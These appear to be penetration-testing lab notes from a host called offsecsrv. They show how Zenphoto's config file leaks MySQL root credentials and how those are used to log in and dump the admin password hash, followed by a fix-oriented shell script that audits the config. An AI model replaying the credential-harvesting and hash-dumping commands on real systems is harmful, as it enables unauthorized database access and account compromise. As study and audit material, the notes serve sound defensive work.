MySQL
Checking for DB credentials after performing a manual system enumeration
www-data@offsecsrv:/var/www/test/zp-data$ cat zp-config.php | grep -v '^[#/]'
<?php /* PUT NOTHING BEFORE THIS LINE, not even a line break! */
global $_zp_conf_vars;
$conf = array();
Note: zp-config.php.source is the source file for zp-config.php
For most installations Setup.php will copy zp-config.php.source to zp-config.php and
make the necessary changes to it. Unless this fails you most likely have no need even
to read this file.
If for some reason setup.php is not able to edit the zp-config.php file and you cannot
fix the file/folder permissions so that it can then you may have copy the
zp-config.php.source file to zp-config.php and make changes here manually.
Advanced installations may wish to modify the album folder definitions below.
Also on some servers zenphoto has problems correctly determining the WEB path and
SERVER path. For these cases you will need to implement the path overrides below.
$conf['db_software'] = 'MySQL'; // someday we may support other databases
** might be a different software **/
$conf['mysql_user'] = 'root'; // Supply your Database user id.
$conf['mysql_pass'] = 'hola'; // Supply your Database password.
$conf['mysql_host'] = 'localhost'; // Supply the name of your Database server.
$conf['mysql_database'] = 'zenphoto'; // Supply the name of Zenphoto's database
$conf['mysql_prefix'] = "zp_";
$conf['UTF-8'] = true;
$conf['album_folder'] = '/albums/';
$conf['album_folder_class'] = 'std';
$conf['server_protocol'] = "http";
$conf['FILESYSTEM_CHARSET'] = 'UTF-8';
if (!defined('CHMOD_VALUE')) { define('CHMOD_VALUE',0755); }
$_zp_conf_vars = $conf;
unset($conf);
?>
DB credential identified; root:hola
root
Session
www-data@offsecsrv:/var/www/test/zp-data$ mysql -h 127.0.0.1 -uroot -phola
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 72
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Session established
mysql> SHOW databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| zenphoto           |
+--------------------+
3 rows in set (0.00 sec)
mysql> use zenphoto;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> SELECT user,pass FROM zp_administrators;
+----------------+------------------------------------------+
| user           | pass                                     |
+----------------+------------------------------------------+
| administrators | NULL                                     |
| viewers        | NULL                                     |
| bozos          | NULL                                     |
| album managers | NULL                                     |
| default        | NULL                                     |
| newuser        | NULL                                     |
| admin          | 63e5c2e178e611b692b526f8b6332317f2ff5513 |
+----------------+------------------------------------------+
7 rows in set (0.00 sec)
Password hash found for the admin user; 63e5c2e178e611b692b526f8b6332317f2ff5513
hashcat was unable to crack the password hash
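From the defender's side, the zp-config.php shown above has two problems an audit can catch: the application connects to MySQL as root, and the password is very short. The following is an added example, not part of the original notes or of Zenphoto: a small shell audit for that config format. The function names, the finding codes, the 12-character threshold and the world-readable check are assumptions, and values are assumed to be single-quoted as in the file above.

```shell
#!/bin/sh
# Added example: audit a Zenphoto-style zp-config.php for weak DB settings.
MIN_PASS_LEN=${MIN_PASS_LEN:-12}   # assumed policy threshold, not from the page

# Print the single-quoted value assigned to $conf['<key>'] (hypothetical helper).
# $1 = key name, $2 = config file
zp_conf_value() {
    awk -F"'" -v k="$1" '$1 ~ /^[ \t]*\$conf\[$/ && $2 == k { print $4; exit }' "$2"
}

# Print one finding code per line for the config file given as $1.
audit_zp_config() {
    user=$(zp_conf_value mysql_user "$1")
    pass=$(zp_conf_value mysql_pass "$1")
    # The web application should not hold the MySQL superuser account:
    # anyone who can read this file then controls every database on the server.
    [ "$user" = "root" ] && echo "DB_USER_IS_ROOT"
    # A missing or short password is reported the same way.
    [ "${#pass}" -lt "$MIN_PASS_LEN" ] && echo "DB_PASSWORD_TOO_SHORT"
    # The file only needs to be readable by the web server account.
    [ -n "$(find "$1" -maxdepth 0 -perm -004)" ] && echo "CONFIG_WORLD_READABLE"
    return 0
}

# Constructed sample reproducing the DB lines from the config shown on this page.
sample=$(mktemp)
cat > "$sample" <<'EOF'
<?php
$conf['mysql_user'] = 'root'; // Supply your Database user id.
$conf['mysql_pass'] = 'hola'; // Supply your Database password.
$conf['mysql_host'] = 'localhost'; // Supply the name of your Database server.
EOF
chmod 644 "$sample"
audit_zp_config "$sample"
rm -f "$sample"
```

The usual fix for the first finding is a dedicated MySQL account with privileges limited to the zenphoto database.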